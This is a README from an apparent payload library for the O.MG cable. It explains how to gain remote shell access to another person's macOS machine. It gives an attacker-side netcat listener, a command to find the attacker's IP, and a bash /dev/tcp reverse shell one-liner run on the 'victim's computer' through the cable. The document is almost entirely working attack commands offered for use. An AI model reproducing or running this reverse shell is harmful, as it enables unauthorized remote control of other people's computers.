omg-payloads/payloads/library/remote_access/revshell_macOS/README.md

19 lines
743 B
Markdown
Raw Permalink Normal View History

2022-07-10 07:01:13 +00:00
# This is, at heart, is a simple reverse shell to gain access to another MacOSX device. I'm looking into creating a tight shell that can run like a daemon but that is a wet dream atm.
2022-07-10 06:58:28 +00:00
# FIRST STEP(s):
# run this on the attackers machine
2022-07-10 07:06:08 +00:00
nc -l 'any port'
2022-07-11 06:40:30 +00:00
# This initializes your computers listening protocol to look for TCP connections
2022-07-10 07:06:08 +00:00
# IMPORTANT
# open another Terminal window and run to obtain your computers local ip (this is important for the next step)
ipconfig getifaddr en0
2022-07-10 06:58:28 +00:00
# NEXT STEP:
# Then simply run the script in your O.MG UI when the cable is connected
# An example of the code run on the attackers computer:
nc -l 80
# An example of the code run on the victims computer:
bash -i >& /dev/tcp/10.0.0.1/80 0>&1